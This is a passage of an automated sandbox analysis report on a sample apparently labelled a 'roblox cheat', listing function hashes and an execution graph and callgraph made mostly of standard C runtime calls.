                                                                                  Function 01A59D48 Relevance: .1, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 485d6eeeee7d021195e80c930717a626240f11b5eb452300495f77b613bcc319
                                                                                  • Instruction ID: 82688a4855382e8f142a14354f3743f6fd2655e7ce6f350e6a391410e1b62710
                                                                                  • Opcode Fuzzy Hash: 485d6eeeee7d021195e80c930717a626240f11b5eb452300495f77b613bcc319
                                                                                  • Instruction Fuzzy Hash: D501DD317092449FD7151A7A98146ABBAEBAFCD210B598477E906C7389CD388C095761
                                                                                  Function 01A5D578 Relevance: .0, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f21a659e2559e5a5acede330fcebf8bab5cbbd228b14ff3955ec69e7890d256
                                                                                  • Instruction ID: 628dc3653d930a2289e7f231025f706db4aa315fdca39cabdd4477b74fc4cfc6
                                                                                  • Opcode Fuzzy Hash: 7f21a659e2559e5a5acede330fcebf8bab5cbbd228b14ff3955ec69e7890d256
                                                                                  • Instruction Fuzzy Hash: EA1127B4E08249CFCB05CFA9D5449ADBBF1EF4A310B2485EAD864AB361D7345A01DB91
                                                                                  Function 01A5D6D5 Relevance: .0, Instructions: 40COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 147d3275026f1dfba70ffadcd3f76df7037382d86db1362efeb8f2c1def6c406
                                                                                  • Instruction ID: 2e40a9024dd594a0fd8d10a9e9fe0cf7af7b416c67c37124403ed9662082bbb5
                                                                                  • Opcode Fuzzy Hash: 147d3275026f1dfba70ffadcd3f76df7037382d86db1362efeb8f2c1def6c406
                                                                                  • Instruction Fuzzy Hash: 0B01E574A0520ACFCB41DFA9D9408ADBBB4FF49200B1045AAD815BB712D7319D05CF61
                                                                                  Function 01A591F0 Relevance: .0, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0e890299fd28a7d5debf2491d013eabd4b1afd9cdb3a1a560b03c894ea021639
                                                                                  • Instruction ID: 4ca275727e6e0d2348b5634733c73b4839e3712772e8f331eef0918dffec6e14
                                                                                  • Opcode Fuzzy Hash: 0e890299fd28a7d5debf2491d013eabd4b1afd9cdb3a1a560b03c894ea021639
                                                                                  • Instruction Fuzzy Hash: 17E01270D453099FCB94DFB4C4456AEBFF0EB49210F10416AD814EA205E3700A518FC1
                                                                                  Function 01A59200 Relevance: .0, Instructions: 17COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 99f250dbed79ec3e5242181d2503b2e08de415b56c28a20c95198bcddbac1618
                                                                                  • Instruction ID: 323ff1fcf07100292a6eef931b3ba8c9330df532771c81ba6e37ee656bf06bdf
                                                                                  • Opcode Fuzzy Hash: 99f250dbed79ec3e5242181d2503b2e08de415b56c28a20c95198bcddbac1618
                                                                                  • Instruction Fuzzy Hash: FFE0EC70D042099FCB94EFA9C54666EBBF4AB48200F10816AD818D6244E7705A508BC1

                                                                                  Execution Graph

                                                                                  Execution Coverage:13.8%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:3.7%
                                                                                  Total number of Nodes:493
                                                                                  Total number of Limit Nodes:6
                                                                                  execution_graph 1396 d16350 1397 d1636e 1396->1397 1410 d16310 1397->1410 1399 d1641d 1400 d163ee 1400->1399 1402 d16310 _ValidateLocalCookies 5 API calls 1400->1402 1401 d1638c ___except_validate_context_record 1401->1399 1401->1400 1406 d1642a __IsNonwritableInCurrentImage 1401->1406 1402->1399 1403 d1dfd0 RtlUnwind 1404 d16477 1403->1404 1405 d16310 _ValidateLocalCookies 5 API calls 1404->1405 1407 d1649d 1405->1407 1406->1403 1408 d231dc 14 API calls 1407->1408 1409 d164c5 1407->1409 1408->1409 1411 d16322 1410->1411 1412 d1632f 1410->1412 1414 d12f6a 1411->1414 1415 d12f73 IsProcessorFeaturePresent 1414->1415 1416 d12f72 1414->1416 1418 d12fb5 1415->1418 1416->1412 1421 d12f78 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1418->1421 1420 d13098 1420->1412 1421->1420 1990 d1df40 1991 d1df52 1990->1991 1993 d1df60 1990->1993 1992 d12f6a _ValidateLocalCookies 5 API calls 1991->1992 1992->1993 1994 d12820 1997 d134e2 1994->1997 1996 d12825 1996->1996 1998 d134f8 1997->1998 2000 d13501 1998->2000 2001 d13495 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1998->2001 2000->1996 2001->2000 2002 d3383b 2003 d33847 ___free_lconv_mon 2002->2003 2008 d34802 EnterCriticalSection 2003->2008 2005 d33856 2009 d338b6 2005->2009 2008->2005 2012 d3484a LeaveCriticalSection 2009->2012 2011 d338a8 2012->2011 1422 d2443f 1423 d2444b ___free_lconv_mon 1422->1423 1424 d24452 GetLastError ExitThread 1423->1424 1425 d2445f 1423->1425 1436 d3a1c5 GetLastError 1425->1436 1427 d24464 1491 d3d0f8 1427->1491 1431 d2447b 1496 d2461e 1431->1496 1437 d3a1e1 1436->1437 1438 d3a1db 1436->1438 1442 d3a1e5 1437->1442 1507 d3cd5a 1437->1507 1502 d3cd1b 1438->1502 1444 d3a26a SetLastError 1442->1444 1443 d3a205 1512 d3b99b 1443->1512 1446 d3a275 1444->1446 1447 d3a27a 1444->1447 1446->1427 1530 d2462c 1447->1530 1450 d3a22b 1453 d3cd5a ___free_lconv_mon 6 API calls 1450->1453 1451 d3a21a 1452 d3cd5a ___free_lconv_mon 6 API calls 1451->1452 1455 d3a228 1452->1455 1456 d3a237 1453->1456 1454 d3a27f 1457 d3a291 1454->1457 1460 d3cd1b ___free_lconv_mon 6 API calls 1454->1460 1519 d3a4b0 1455->1519 1458 d3a252 1456->1458 1459 d3a23b 1456->1459 1461 d3cd5a ___free_lconv_mon 6 API calls 1457->1461 1466 d3a297 1457->1466 1525 d39ff3 1458->1525 1462 d3cd5a ___free_lconv_mon 6 API calls 1459->1462 1460->1457 1465 d3a2ab 1461->1465 1462->1455 1465->1466 1469 d3a2af 1465->1469 1471 d2462c 43 API calls 1466->1471 1472 d3a29c 1466->1472 1467 d3a24f 1467->1444 1470 d3b99b ___free_lconv_mon 14 API calls 1469->1470 1474 d3a2bb 1470->1474 1475 d3a315 1471->1475 1472->1427 1473 d3a4b0 ___free_lconv_mon 14 API calls 1473->1467 1476 d3a2c3 1474->1476 1477 d3a2d8 1474->1477 1478 d3cd5a ___free_lconv_mon 6 API calls 1476->1478 1479 d3cd5a ___free_lconv_mon 6 API calls 1477->1479 1480 d3a2cf 1478->1480 1481 d3a2e4 1479->1481 1484 d3a4b0 ___free_lconv_mon 14 API calls 1480->1484 1482 d3a2f7 1481->1482 1483 d3a2e8 1481->1483 1486 d39ff3 ___free_lconv_mon 14 API calls 1482->1486 1485 d3cd5a ___free_lconv_mon 6 API calls 1483->1485 1488 d3a2d5 1484->1488 1485->1480 1487 d3a302 1486->1487 1489 d3a4b0 ___free_lconv_mon 14 API calls 1487->1489 1488->1466 1490 d3a309 1489->1490 1490->1472 1492 d2446f 1491->1492 1493 d3d10a GetPEB 1491->1493 1492->1431 1499 d3d003 1492->1499 1493->1492 1494 d3d11d 1493->1494 1975 d3cb8d 1494->1975 1978 d244f4 1496->1978 1498 d2462b 1500 d3caca ___free_lconv_mon 5 API calls 1499->1500 1501 d3d01f 1500->1501 1501->1431 1542 d3caca 1502->1542 1505 d3cd52 TlsGetValue 1506 d3cd40 1506->1437 1508 d3caca ___free_lconv_mon 5 API calls 1507->1508 1509 d3cd76 1508->1509 1510 d3cd94 TlsSetValue 1509->1510 1511 d3a1fd 1509->1511 1511->1442 1511->1443 1517 d3b9a8 ___free_lconv_mon 1512->1517 1513 d3b9e8 1560 d1e672 1513->1560 1514 d3b9d3 HeapAlloc 1515 d3a212 1514->1515 1514->1517 1515->1450 1515->1451 1517->1513 1517->1514 1557 d425ed 1517->1557 1520 d3a4bb RtlFreeHeap 1519->1520 1521 d3a4e5 1519->1521 1520->1521 1522 d3a4d0 GetLastError 1520->1522 1521->1467 1523 d3a4dd ___free_lconv_mon 1522->1523 1524 d1e672 ___free_lconv_mon 12 API calls 1523->1524 1524->1521 1599 d39e87 1525->1599 1741 d33980 1530->1741 1533 d2463c 1534 d24646 IsProcessorFeaturePresent 1533->1534 1535 d24665 1533->1535 1537 d24652 1534->1537 1792 d3447d 1535->1792 1786 d1e378 1537->1786 1541 d246a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 1541->1454 1543 d3caf8 1542->1543 1547 d3caf4 1542->1547 1543->1547 1549 d3c9ff 1543->1549 1546 d3cb12 GetProcAddress 1546->1547 1548 d3cb22 ___free_lconv_mon 1546->1548 1547->1505 1547->1506 1548->1547 1555 d3ca10 ___free_lconv_mon 1549->1555 1550 d3caa6 1550->1546 1550->1547 1551 d3ca2e LoadLibraryExW 1552 d3ca49 GetLastError 1551->1552 1553 d3caad 1551->1553 1552->1555 1553->1550 1554 d3cabf FreeLibrary 1553->1554 1554->1550 1555->1550 1555->1551 1556 d3ca7c LoadLibraryExW 1555->1556 1556->1553 1556->1555 1563 d4261a 1557->1563 1574 d3a316 GetLastError 1560->1574 1562 d1e677 1562->1515 1564 d42626 ___free_lconv_mon 1563->1564 1569 d34802 EnterCriticalSection 1564->1569 1566 d42631 1570 d4266d 1566->1570 1569->1566 1573 d3484a LeaveCriticalSection 1570->1573 1572 d425f8 1572->1517 1573->1572 1575 d3a332 1574->1575 1576 d3a32c 1574->1576 1578 d3cd5a ___free_lconv_mon 6 API calls 1575->1578 1580 d3a336 1575->1580 1577 d3cd1b ___free_lconv_mon 6 API calls 1576->1577 1577->1575 1579 d3a34e 1578->1579 1579->1580 1581 d3a356 1579->1581 1582 d3a3bb SetLastError 1580->1582 1583 d3b99b ___free_lconv_mon 12 API calls 1581->1583 1582->1562 1584 d3a363 1583->1584 1585 d3a36b 1584->1585 1586 d3a37c 1584->1586 1587 d3cd5a ___free_lconv_mon 6 API calls 1585->1587 1588 d3cd5a ___free_lconv_mon 6 API calls 1586->1588 1596 d3a379 1587->1596 1589 d3a388 1588->1589 1590 d3a3a3 1589->1590 1591 d3a38c 1589->1591 1592 d39ff3 ___free_lconv_mon 12 API calls 1590->1592 1593 d3cd5a ___free_lconv_mon 6 API calls 1591->1593 1595 d3a3ae 1592->1595 1593->1596 1594 d3a4b0 ___free_lconv_mon 12 API calls 1597 d3a3a0 1594->1597 1598 d3a4b0 ___free_lconv_mon 12 API calls 1595->1598 1596->1594 1597->1582 1598->1597 1600 d39e93 ___free_lconv_mon 1599->1600 1613 d34802 EnterCriticalSection 1600->1613 1602 d39e9d 1614 d39ecd 1602->1614 1605 d39f99 1606 d39fa5 ___free_lconv_mon 1605->1606 1618 d34802 EnterCriticalSection 1606->1618 1608 d39faf 1619 d3a17a 1608->1619 1610 d39fc7 1623 d39fe7 1610->1623 1613->1602 1617 d3484a LeaveCriticalSection 1614->1617 1616 d39ebb 1616->1605 1617->1616 1618->1608 1620 d3a1b0 ___free_lconv_mon 1619->1620 1621 d3a189 ___free_lconv_mon 1619->1621 1620->1610 1621->1620 1626 d434ce 1621->1626 1740 d3484a LeaveCriticalSection 1623->1740 1625 d39fd5 1625->1473 1627 d4354e 1626->1627 1630 d434e4 1626->1630 1628 d4359c 1627->1628 1631 d3a4b0 ___free_lconv_mon 14 API calls 1627->1631 1694 d4363f 1628->1694 1630->1627 1633 d43517 1630->1633 1638 d3a4b0 ___free_lconv_mon 14 API calls 1630->1638 1632 d43570 1631->1632 1634 d3a4b0 ___free_lconv_mon 14 API calls 1632->1634 1635 d43539 1633->1635 1640 d3a4b0 ___free_lconv_mon 14 API calls 1633->1640 1636 d43583 1634->1636 1637 d3a4b0 ___free_lconv_mon 14 API calls 1635->1637 1639 d3a4b0 ___free_lconv_mon 14 API calls 1636->1639 1641 d43543 1637->1641 1643 d4350c 1638->1643 1645 d43591 1639->1645 1646 d4352e 1640->1646 1647 d3a4b0 ___free_lconv_mon 14 API calls 1641->1647 1642 d4360a 1648 d3a4b0 ___free_lconv_mon 14 API calls 1642->1648 1654 d427d2 1643->1654 1644 d435aa 1644->1642 1652 d3a4b0 14 API calls ___free_lconv_mon 1644->1652 1650 d3a4b0 ___free_lconv_mon 14 API calls 1645->1650 1682 d42c86 1646->1682 1647->1627 1653 d43610 1648->1653 1650->1628 1652->1644 1653->1620 1655 d427e3 1654->1655 1656 d428cc 1654->1656 1657 d427f4 1655->1657 1658 d3a4b0 ___free_lconv_mon 14 API calls 1655->1658 1656->1633 1659 d42806 1657->1659 1661 d3a4b0 ___free_lconv_mon 14 API calls 1657->1661 1658->1657 1660 d42818 1659->1660 1662 d3a4b0 ___free_lconv_mon 14 API calls 1659->1662 1663 d4282a 1660->1663 1664 d3a4b0 ___free_lconv_mon 14 API calls 1660->1664 1661->1659 1662->1660 1665 d4283c 1663->1665 1666 d3a4b0 ___free_lconv_mon 14 API calls 1663->1666 1664->1663 1667 d4284e 1665->1667 1669 d3a4b0 ___free_lconv_mon 14 API calls 1665->1669 1666->1665 1668 d42860 1667->1668 1670 d3a4b0 ___free_lconv_mon 14 API calls 1667->1670 1671 d42872 1668->1671 1672 d3a4b0 ___free_lconv_mon 14 API calls 1668->1672 1669->1667 1670->1668 1673 d42884 1671->1673 1674 d3a4b0 ___free_lconv_mon 14 API calls 1671->1674 1672->1671 1675 d42896 1673->1675 1677 d3a4b0 ___free_lconv_mon 14 API calls 1673->1677 1674->1673 1676 d428a8 1675->1676 1678 d3a4b0 ___free_lconv_mon 14 API calls 1675->1678 1679 d428ba 1676->1679 1680 d3a4b0 ___free_lconv_mon 14 API calls 1676->1680 1677->1675 1678->1676 1679->1656 1681 d3a4b0 ___free_lconv_mon 14 API calls 1679->1681 1680->1679 1681->1656 1683 d42c93 1682->1683 1693 d42ceb 1682->1693 1684 d3a4b0 ___free_lconv_mon 14 API calls 1683->1684 1686 d42ca3 1683->1686 1684->1686 1685 d42cc7 1689 d42cd9 1685->1689 1691 d3a4b0 ___free_lconv_mon 14 API calls 1685->1691 1687 d3a4b0 ___free_lconv_mon 14 API calls 1686->1687 1690 d42cb5 1686->1690 1687->1690 1688 d3a4b0 ___free_lconv_mon 14 API calls 1688->1685 1692 d3a4b0 ___free_lconv_mon 14 API calls 1689->1692 1689->1693 1690->1685 1690->1688 1691->1689 1692->1693 1693->1635 1695 d4364c 1694->1695 1699 d4366b 1694->1699 1695->1699 1700 d431a1 1695->1700 1698 d3a4b0 ___free_lconv_mon 14 API calls 1698->1699 1699->1644 1701 d4327f 1700->1701 1702 d431b2 1700->1702 1701->1698 1736 d42f00 1702->1736 1705 d42f00 ___free_lconv_mon 14 API calls 1706 d431c5 1705->1706 1707 d42f00 ___free_lconv_mon 14 API calls 1706->1707 1708 d431d0 1707->1708 1709 d42f00 ___free_lconv_mon 14 API calls 1708->1709 1710 d431db 1709->1710 1711 d42f00 ___free_lconv_mon 14 API calls 1710->1711 1712 d431e9 1711->1712 1713 d3a4b0 ___free_lconv_mon 14 API calls 1712->1713 1714 d431f4 1713->1714 1715 d3a4b0 ___free_lconv_mon 14 API calls 1714->1715 1716 d431ff 1715->1716 1717 d3a4b0 ___free_lconv_mon 14 API calls 1716->1717 1718 d4320a 1717->1718 1719 d42f00 ___free_lconv_mon 14 API calls 1718->1719 1720 d43218 1719->1720 1721 d42f00 ___free_lconv_mon 14 API calls 1720->1721 1722 d43226 1721->1722 1723 d42f00 ___free_lconv_mon 14 API calls 1722->1723 1724 d43237 1723->1724 1725 d42f00 ___free_lconv_mon 14 API calls 1724->1725 1726 d43245 1725->1726 1727 d42f00 ___free_lconv_mon 14 API calls 1726->1727 1728 d43253 1727->1728 1729 d3a4b0 ___free_lconv_mon 14 API calls 1728->1729 1730 d4325e 1729->1730 1731 d3a4b0 ___free_lconv_mon 14 API calls 1730->1731 1732 d43269 1731->1732 1733 d3a4b0 ___free_lconv_mon 14 API calls 1732->1733 1734 d43274 1733->1734 1735 d3a4b0 ___free_lconv_mon 14 API calls 1734->1735 1735->1701 1737 d42f12 1736->1737 1738 d42f21 1737->1738 1739 d3a4b0 ___free_lconv_mon 14 API calls 1737->1739 1738->1705 1739->1737 1740->1625 1795 d337b8 1741->1795 1744 d339c5 1745 d339d1 ___free_lconv_mon 1744->1745 1746 d3a316 ___free_lconv_mon 14 API calls 1745->1746 1750 d339fe 1745->1750 1753 d339f8 1745->1753 1746->1753 1747 d33a45 1748 d1e672 ___free_lconv_mon 14 API calls 1747->1748 1749 d33a4a 1748->1749 1813 d1e574 1749->1813 1752 d33a71 1750->1752 1816 d34802 EnterCriticalSection 1750->1816 1756 d33ab3 1752->1756 1757 d33ba4 1752->1757 1766 d33ae2 1752->1766 1753->1747 1753->1750 1774 d33a2f 1753->1774 1762 d3a1c5 43 API calls 1756->1762 1756->1766 1758 d33baf 1757->1758 1821 d3484a LeaveCriticalSection 1757->1821 1761 d3447d 23 API calls 1758->1761 1771 d33bb7 ___free_lconv_mon 1761->1771 1763 d33ad7 1762->1763 1765 d3a1c5 43 API calls 1763->1765 1764 d3a1c5 43 API calls 1767 d33b37 1764->1767 1765->1766 1817 d33b51 1766->1817 1773 d3a1c5 43 API calls 1767->1773 1767->1774 1768 d33c9e 1822 d34802 EnterCriticalSection 1768->1822 1771->1768 1775 d33c09 1771->1775 1783 d33c18 1771->1783 1772 d33cb2 1776 d33cc9 SetConsoleCtrlHandler 1772->1776 1780 d33cda ___free_lconv_mon 1772->1780 1773->1774 1774->1533 1779 d3a316 ___free_lconv_mon 14 API calls 1775->1779 1775->1783 1777 d33ce3 GetLastError 1776->1777 1776->1780 1823 d1e65f 1777->1823 1781 d33c23 1779->1781 1826 d33d55 1780->1826 1781->1783 1806 d3a4ea 1781->1806 1785 d33c69 1783->1785 1829 d3394f 1783->1829 1785->1533 1787 d1e394 1786->1787 1788 d1e3c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1787->1788 1791 d1e491 1788->1791 1789 d12f6a _ValidateLocalCookies 5 API calls 1790 d1e4af 1789->1790 1790->1535 1791->1789 1898 d342e4 1792->1898 1796 d337c4 ___free_lconv_mon 1795->1796 1801 d34802 EnterCriticalSection 1796->1801 1798 d337d2 1802 d33810 1798->1802 1801->1798 1805 d3484a LeaveCriticalSection 1802->1805 1804 d24631 1804->1533 1804->1744 1805->1804 1807 d3a528 1806->1807 1811 d3a4f8 ___free_lconv_mon 1806->1811 1809 d1e672 ___free_lconv_mon 14 API calls 1807->1809 1808 d3a513 RtlAllocateHeap 1810 d3a526 1808->1810 1808->1811 1809->1810 1810->1783 1811->1807 1811->1808 1812 d425ed ___free_lconv_mon 2 API calls 1811->1812 1812->1811 1833 d1e4c0 1813->1833 1816->1752 1818 d33b57 1817->1818 1819 d33b28 1817->1819 1896 d3484a LeaveCriticalSection 1818->1896 1819->1764 1819->1767 1819->1774 1821->1758 1822->1772 1824 d3a316 ___free_lconv_mon 14 API calls 1823->1824 1825 d1e664 1824->1825 1825->1780 1897 d3484a LeaveCriticalSection 1826->1897 1828 d33d5c 1828->1783 1830 d33975 1829->1830 1831 d3395c 1829->1831 1830->1785 1831->1830 1832 d1e672 ___free_lconv_mon 14 API calls 1831->1832 1832->1830 1834 d1e4d2 1833->1834 1839 d1e4f7 1834->1839 1836 d1e4ea 1850 d1e2b0 1836->1850 1840 d1e50e 1839->1840 1841 d1e507 1839->1841 1845 d1e51c 1840->1845 1860 d1e2ec 1840->1860 1856 d1e315 GetLastError 1841->1856 1844 d1e543 1844->1845 1863 d1e5a1 IsProcessorFeaturePresent 1844->1863 1845->1836 1847 d1e573 1848 d1e4c0 45 API calls 1847->1848 1849 d1e580 1848->1849 1849->1836 1851 d1e2bc 1850->1851 1852 d1e2d3 1851->1852 1889 d1e35b 1851->1889 1854 d1e2e6 1852->1854 1855 d1e35b 45 API calls 1852->1855 1854->1774 1855->1854 1857 d1e32e 1856->1857 1867 d3a3c7 1857->1867 1861 d1e310 1860->1861 1862 d1e2f7 GetLastError SetLastError 1860->1862 1861->1844 1862->1844 1864 d1e5ad 1863->1864 1865 d1e378 8 API calls 1864->1865 1866 d1e5c2 GetCurrentProcess TerminateProcess 1865->1866 1866->1847 1868 d3a3e0 1867->1868 1869 d3a3da 1867->1869 1870 d3cd5a ___free_lconv_mon 6 API calls 1868->1870 1888 d1e346 SetLastError 1868->1888 1871 d3cd1b ___free_lconv_mon 6 API calls 1869->1871 1872 d3a3fa 1870->1872 1871->1868 1873 d3b99b ___free_lconv_mon 14 API calls 1872->1873 1872->1888 1874 d3a40a 1873->1874 1875 d3a412 1874->1875 1876 d3a427 1874->1876 1877 d3cd5a ___free_lconv_mon 6 API calls 1875->1877 1878 d3cd5a ___free_lconv_mon 6 API calls 1876->1878 1885 d3a41e 1877->1885 1879 d3a433 1878->1879 1880 d3a437 1879->1880 1881 d3a446 1879->1881 1884 d3cd5a ___free_lconv_mon 6 API calls 1880->1884 1882 d39ff3 ___free_lconv_mon 14 API calls 1881->1882 1886 d3a451 1882->1886 1883 d3a4b0 ___free_lconv_mon 14 API calls 1883->1888 1884->1885 1885->1883 1887 d3a4b0 ___free_lconv_mon 14 API calls 1886->1887 1887->1888 1888->1840 1890 d1e365 1889->1890 1891 d1e36e 1889->1891 1892 d1e315 16 API calls 1890->1892 1891->1852 1893 d1e36a 1892->1893 1893->1891 1894 d2462c 45 API calls 1893->1894 1895 d1e377 1894->1895 1896->1819 1897->1828 1899 d34323 1898->1899 1900 d34311 1898->1900 1911 d341ac 1899->1911 1919 d13398 GetModuleHandleW 1900->1919 1905 d2466f GetSystemTimeAsFileTime 1905->1541 1906 d3436d 1926 d3437b 1906->1926 1912 d341b8 ___free_lconv_mon 1911->1912 1933 d34802 EnterCriticalSection 1912->1933 1914 d341c2 1934 d341f9 1914->1934 1916 d341cf 1938 d341ed 1916->1938 1920 d133a4 1919->1920 1920->1899 1921 d343ce GetModuleHandleExW 1920->1921 1922 d3440d GetProcAddress 1921->1922 1925 d34421 1921->1925 1922->1925 1923 d34434 FreeLibrary 1924 d34322 1923->1924 1924->1899 1925->1923 1925->1924 1963 d343ac 1926->1963 1929 d34399 1931 d343ce 3 API calls 1929->1931 1930 d34389 GetCurrentProcess TerminateProcess 1930->1929 1932 d343a1 ExitProcess 1931->1932 1933->1914 1935 d34205 ___free_lconv_mon 1934->1935 1936 d3426c 1935->1936 1941 d37a3b 1935->1941 1936->1916 1962 d3484a LeaveCriticalSection 1938->1962 1940 d341db 1940->1905 1940->1906 1942 d37a47 __EH_prolog3 1941->1942 1945 d37793 1942->1945 1944 d37a6e 1944->1936 1946 d3779f ___free_lconv_mon 1945->1946 1953 d34802 EnterCriticalSection 1946->1953 1948 d377ad 1954 d3794b 1948->1954 1953->1948 1955 d3796a 1954->1955 1956 d377ba 1954->1956 1955->1956 1957 d3a4b0 ___free_lconv_mon 14 API calls 1955->1957 1958 d377e2 1956->1958 1957->1956 1961 d3484a LeaveCriticalSection 1958->1961 1960 d377cb 1960->1944 1961->1960 1962->1940 1968 d3d13c GetPEB 1963->1968 1966 d343b6 GetPEB 1967 d34385 1966->1967 1967->1929 1967->1930 1969 d3d156 1968->1969 1971 d343b1 1968->1971 1972 d3cb4d 1969->1972 1971->1966 1971->1967 1973 d3caca ___free_lconv_mon 5 API calls 1972->1973 1974 d3cb69 1973->1974 1974->1971 1976 d3caca ___free_lconv_mon 5 API calls 1975->1976 1977 d3cba9 1976->1977 1977->1492 1979 d3a316 ___free_lconv_mon 14 API calls 1978->1979 1980 d244ff 1979->1980 1981 d24541 ExitThread 1980->1981 1982 d24518 1980->1982 1987 d3d03e 1980->1987 1984 d2452b 1982->1984 1985 d24524 CloseHandle 1982->1985 1984->1981 1986 d24537 FreeLibraryAndExitThread 1984->1986 1985->1984 1986->1981 1988 d3caca ___free_lconv_mon 5 API calls 1987->1988 1989 d3d057 1988->1989 1989->1982 2016 d5d7fb 2017 d12f6a _ValidateLocalCookies 5 API calls 2016->2017 2018 d5d80e 2017->2018

                                                                                  Callgraph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  • Opacity -> Relevance
                                                                                  • Disassembly available
                                                                                  callgraph 0 Function_00D1DFD0 1 Function_00D1E5D5 2 Function_00D427D2 50 Function_00D3A4B0 2->50 3 Function_00D231DC 3->50 4 Function_00D1E4C0 17 Function_00D1E4F7 4->17 47 Function_00D1E2B0 4->47 90 Function_00D1E268 4->90 5 Function_00D3A3C7 12 Function_00D39FF3 5->12 38 Function_00D3B99B 5->38 5->50 68 Function_00D3CD5A 5->68 97 Function_00D3CD1B 5->97 6 Function_00D339C5 7 Function_00D3A1C5 6->7 14 Function_00D13CF0 6->14 26 Function_00D338E5 6->26 29 Function_00D3A4EA 6->29 62 Function_00D13450 6->62 65 Function_00D33B51 6->65 67 Function_00D33D55 6->67 71 Function_00D1E65F 6->71 75 Function_00D3484A 6->75 76 Function_00D3394F 6->76 80 Function_00D1E672 6->80 83 Function_00D1E574 6->83 88 Function_00D3447D 6->88 96 Function_00D3A316 6->96 100 Function_00D3381C 6->100 102 Function_00D34802 6->102 113 Function_00D33927 6->113 7->12 7->38 7->50 7->68 7->97 114 Function_00D2462C 7->114 8 Function_00D3CACA 20 Function_00D3C9FF 8->20 8->100 9 Function_00D434CE 9->2 43 Function_00D42C86 9->43 9->50 107 Function_00D4363F 9->107 10 Function_00D343CE 11 Function_00D39ECD 11->75 41 Function_00D39F99 12->41 45 Function_00D39E87 12->45 13 Function_00D1DFF0 57 Function_00D1DEA0 13->57 15 Function_00D4DFF0 37 Function_00D4DF90 15->37 52 Function_00D4E0B0 15->52 16 Function_00D244F4 16->96 110 Function_00D3D03E 16->110 17->4 30 Function_00D1E2EC 17->30 56 Function_00D1E5A1 17->56 95 Function_00D1E315 17->95 18 Function_00D341F9 18->62 104 Function_00D38531 18->104 105 Function_00D37A3B 18->105 19 Function_00D3D0F8 46 Function_00D3CB8D 19->46 72 Function_00D23142 20->72 21 Function_00D5D7FB 91 Function_00D12F6A 21->91 22 Function_00D377E2 22->75 23 Function_00D134E2 36 Function_00D13495 23->36 24 Function_00D1DFE5 25 Function_00D39FE7 25->75 27 Function_00D342E4 27->10 40 Function_00D13398 27->40 60 Function_00D341AC 27->60 84 Function_00D3437B 27->84 28 Function_00D425ED 99 Function_00D4261A 28->99 29->28 51 Function_00D39CB0 29->51 29->80 31 Function_00D172EC 32 Function_00D341ED 32->75 33 Function_00D37793 33->22 33->62 74 Function_00D3794B 33->74 33->102 34 Function_00D1DF90 35 Function_00D17490 38->28 38->51 38->80 39 Function_00D13198 41->25 41->62 85 Function_00D3A17A 41->85 41->102 42 Function_00D43699 81 Function_00D43670 42->81 43->50 44 Function_00D33980 55 Function_00D337B8 44->55 45->11 45->62 45->102 46->8 69 Function_00D1E35B 47->69 48 Function_00D174B0 49 Function_00D1DFB0 49->35 50->1 50->80 53 Function_00D338B6 53->75 54 Function_00D5EBBF 54->91 55->62 94 Function_00D33810 55->94 55->102 87 Function_00D1E378 56->87 57->35 57->48 58 Function_00D431A1 58->50 103 Function_00D42F00 58->103 59 Function_00D4E1AA 60->18 60->32 60->62 60->102 61 Function_00D343AC 111 Function_00D3D13C 61->111 63 Function_00D12450 64 Function_00D16350 64->0 64->3 64->13 64->15 64->31 64->34 64->49 64->59 92 Function_00D16310 64->92 65->75 66 Function_00D43451 93 Function_00D43616 66->93 67->75 68->8 69->95 69->114 70 Function_00AB2120 71->96 73 Function_00D1DF40 73->57 73->91 74->50 76->80 77 Function_00D3CB4D 77->8 78 Function_00D36E4C 78->96 79 Function_00D14270 80->96 82 Function_00D13175 83->4 84->10 84->61 85->9 85->42 85->66 86 Function_00D12F78 87->79 87->91 108 Function_00D1343D 87->108 88->27 89 Function_00D4266D 